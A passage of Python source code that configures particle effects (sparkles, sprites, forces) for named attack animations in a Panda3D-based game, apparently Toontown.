p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/gear")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.1600)
p0.renderer.setFinalXScale(0.1600)
p0.renderer.setInitialYScale(0.1600)
p0.renderer.setFinalYScale(0.1600)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(15.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 10.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -0.5000))
# Sphere Volume parameters
p0.emitter.setRadius(1.7500)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(0.0000, 0.0000, -79.0000), LinearDistanceForce.FTONEOVERRSQUARED, 15.9701, 95.0000, 1)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def pixieSpray(self):
self.reset()
self.setPos(2.00, 0.000, 4.00)
self.setHpr(-90.000, 45.000, 0.000)
self.setScale(4.000, 4.000, 4.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SparkleParticleRenderer")
p0.setEmitter("DiscEmitter")
p0.setPoolSize(50)
p0.setBirthRate(0.0500)
p0.setLitterSize(4)
p0.setLitterSpread(1)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.6000)
p0.factory.setLifespanSpread(0.1000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
p0.renderer.setUserAlpha(1.00)
# Sparkle parameters
p0.renderer.setCenterColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setEdgeColor(Vec4(0.00, 0.00, 1.00, 1.00))
p0.renderer.setBirthRadius(0.0200)
p0.renderer.setDeathRadius(0.0500)
p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(3.5000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -3.0000, 0.0000))
# Disc parameters
p0.emitter.setRadius(0.100)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(0.0000, 0.0000, -30.0000), LinearDistanceForce.FTONEOVERRSQUARED, 3.0400, 1.5000, 1)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def synergy(self):
self.reset()
self.setPos(0, 7.8, 0.4)
self.setHpr(90.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("RingEmitter")
p0.setPoolSize(250)
p0.setBirthRate(0.0100)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.6)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/dollar-sign")
p0.renderer.setColor(Vec4(0.00, 1.00, 0.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.2)
p0.renderer.setFinalXScale(0.2)
p0.renderer.setInitialYScale(0.2)
p0.renderer.setFinalYScale(0.2)
p0.renderer.setNonanimatedTheta(20.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(5.0697)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(-4.0000, 0.0000, 0.0000))
# Ring parameters
p0.emitter.setRadius(1.8607)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('jfo')
# Force parameters
force0 = LinearJitterForce(1.0000, 0)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def soundWave(self):
self.reset()
self.setPos(0.000, 0.000, 0.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(7.000, 7.000, 7.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("PointEmitter")
p0.setPoolSize(128)
p0.setBirthRate(0.4000)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(10.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(4.0000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(0.0010)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(0.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAOUT)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setTextureFromNode("phase_5/models/props/uberSoundEffects", "**/Circle")
#p0.renderer.addTextureFromFile('maps/Circle.tif')
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.0000)
p0.renderer.setFinalXScale(3.0000)
p0.renderer.setInitialYScale(0.0000)
p0.renderer.setFinalYScale(3.0000)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(1)
p0.renderer.setColorBlendMode(ColorBlendAttrib.MAdd, ColorBlendAttrib.OIncomingAlpha, ColorBlendAttrib.OOne)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETEXPLICIT)
p0.emitter.setAmplitude(0.0100)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Point parameters
p0.emitter.setLocation(Point3(0.0000, 0.0000, 0.0000))
self.addParticles(p0)
@particle
def tnt(self):
self.reset()
self.setPos(0.000, 0.000, -0.600)
self.setHpr(0.000, 10.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(40)
p0.setBirthRate(0.1000)
p0.setLitterSize(2)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.2000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/spark")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.3)
p0.renderer.setFinalXScale(0.3)
p0.renderer.setInitialYScale(0.3)
p0.renderer.setFinalYScale(0.03)
p0.renderer.setNonanimatedTheta(20.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Sparkle parameters
#p0.renderer.setCenterColor(Vec4(0.78, 0.78, 0, 1.00))
#p0.renderer.setEdgeColor(Vec4(0.78, 0.78, 0, 1.00))
#p0.renderer.setBirthRadius(0.0600)
#p0.renderer.setDeathRadius(0.0600)
#p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(1.5000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -2.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.2282)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(0.0000, 0.0000, -19.0000), LinearDistanceForce.FTONEOVERRSQUARED, 15.9701, 95.0100, 1)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def doubleTalkLeft(self):
self.reset()
self.setPos(0.000, 3.000, 3.000)
self.setHpr(55.000, 0.000, 0.000)
self.setScale(3.000, 3.000, 3.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(2)
p0.setBirthRate(0.7000)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.7000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/doubletalk-double")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(1.50)
p0.renderer.setFinalXScale(1.50)
p0.renderer.setInitialYScale(1.50)
p0.renderer.setFinalYScale(1.50)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(12.000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.6000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -8.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.0500)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(6.000, -3.0000, 0.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 1.5000, 1)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def pixieWall(self):
self.reset()
self.setPos(2.500, 0.000, 2.500)
self.setHpr(-90.000, 90.000, -180.000)
self.setScale(1.50)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SparkleParticleRenderer")
p0.setEmitter("DiscEmitter")
p0.setPoolSize(100)
p0.setBirthRate(0.1000)
p0.setLitterSize(100)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(4.0000)
p0.factory.setLifespanSpread(0.2000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAOUT)
p0.renderer.setUserAlpha(1.00)
# Sparkle parameters
p0.renderer.setCenterColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setEdgeColor(Vec4(0.00, 0.00, 1.00, 1.00))
p0.renderer.setBirthRadius(0.0400)
p0.renderer.setDeathRadius(0.0000)
p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(2.5000)
p0.emitter.setAmplitudeSpread(0.5000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(0.0000, 0.0000, 1.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -1.0000))
# Disc parameters
p0.emitter.setRadius(0.5000)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearNoiseForce(0.0500, 0)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def schmoozeUpperSpray(self):
self.reset()
self.setPos(0.000, 3.000, 4.000)
self.setHpr(0.000, 55.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(1)
p0.setBirthRate(0.400)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.900)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/schmooze-master")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.7)
p0.renderer.setFinalXScale(0.07)
p0.renderer.setInitialYScale(0.35)
p0.renderer.setFinalYScale(0.07)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(5.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 11.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -1.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.1000)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(0.0000, -23.0000, -9.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 1.3661, 1)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def firedBaseFlame(self):
self.reset()
self.setPos(0.000, 0.000, 0.500)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(2.500, 4.500, 2.500)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(150)
p0.setBirthRate(0.0200)
p0.setLitterSize(10)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.100)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/fire")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.15)
p0.renderer.setFinalXScale(0.50)
p0.renderer.setInitialYScale(0.30)
p0.renderer.setFinalYScale(0.50)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(1.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 2.200))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -30.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.4000)
self.addParticles(p0)
@particle
def headShrinkSpray(self):
self.reset()
self.setPos(0.000, 2.900, 4.200)
self.setHpr(0.000, 60.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SparkleParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(60) #60)
p0.setBirthRate(0.1000)
p0.setLitterSize(4)
p0.setLitterSpread(2)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.15) #1.1200)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sparkle parameters
p0.renderer.setCenterColor(Vec4(1, 0.84, 0, 1.00))
p0.renderer.setEdgeColor(Vec4(1, 1, 1, 0.3))
p0.renderer.setBirthRadius(0.1500)
p0.renderer.setDeathRadius(0.0000)
p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(12.0000)
p0.emitter.setAmplitudeSpread(0.9000)
p0.emitter.setOffsetForce(Vec3(0.0000, 5.1000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -4.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.4800)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(0.0000, 0.0000, -4.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 2.5308, 1)
force0.setActive(1)
f0.addForce(force0)
force1 = LinearVectorForce(Vec3(0.0000, -7.0000, 0.0000), 1.0000, 0)
force1.setActive(1)
f0.addForce(force1)
self.addForceGroup(f0)
@particle
def jargonSpray(self):
self.reset()
self.setPos(0.000, 3.000, 4.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("LineEmitter")
p0.setPoolSize(4)
p0.setBirthRate(0.200)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.0000)
p0.factory.setLifespanSpread(0.2000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/jargon-brow")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.40)
p0.renderer.setFinalXScale(1.60)
p0.renderer.setInitialYScale(0.10)
p0.renderer.setFinalYScale(0.40)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(5.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 4.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -9.0000, 0.0000))
# Line parameters
p0.emitter.setEndpoint1(Point3(0.0000, 0.0000, 0.0000))
p0.emitter.setEndpoint2(Point3(0.0000, 0.0000, 0.0000))
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearJitterForce(2.1279, 0)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def legaleseSpray(self):
self.reset()
self.setPos(0.000, 2.000, 3.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(1)
p0.setBirthRate(0.2000)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(3.0000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/buzzwords-crash")
p0.renderer.setColor(Vec4(0.00, 0.00, 0.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(1.0)
p0.renderer.setFinalXScale(1.8)
p0.renderer.setInitialYScale(0.5)
p0.renderer.setFinalYScale(0.9)
p0.renderer.setNonanimatedTheta(20.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(8.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 7.0000, -1.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -3.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.0010)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearJitterForce(19.5449, 0)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def powertrip(self):
self.reset()
self.setPos(-2.000, 2.500, 2.200)
self.setHpr(-90.000, 0.000, 0.000)
self.setScale(4.800, 4.800, 4.800)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SparkleParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(100)
p0.setBirthRate(0.0800)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.2500)
p0.factory.setLifespanSpread(0.050)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sparkle parameters
p0.renderer.setCenterColor(Vec4(0.1, 0.95, 0.2, 1.00))
p0.renderer.setEdgeColor(Vec4(0, 0, 0, 1.00))
p0.renderer.setBirthRadius(0.1000)
p0.renderer.setDeathRadius(15.0000)
p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(2.4000)
p0.emitter.setAmplitudeSpread(1.1000)
p0.emitter.setOffsetForce(Vec3(0.0000, 1.1000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -4.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.120)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(10.0000, 0.0000, 0.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 2.5308, 1)
force0.setActive(1)
f0.addForce(force0)
force1 = LinearVectorForce(Vec3(0.0000, 0.0000, 0.0000), 1.0000, 0)
force1.setActive(1)
f0.addForce(force1)
force2 = LinearJitterForce(4.5449, 0)
force2.setActive(1)
f0.addForce(force2)
self.addForceGroup(f0)
@particle
def spinEffect(self):
self.reset()
self.setScale(0.040, 0.040, 0.040)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(100)
p0.setBirthRate(0.1000)
p0.setLitterSize(6)
p0.setLitterSpread(2)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.3000)
p0.factory.setLifespanSpread(0.3000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
